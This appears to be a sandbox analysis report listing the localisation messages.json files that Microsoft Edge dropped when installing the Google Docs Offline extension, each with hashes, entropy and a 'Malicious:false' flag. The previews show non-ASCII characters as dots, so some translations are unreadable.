                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                              Malicious:false
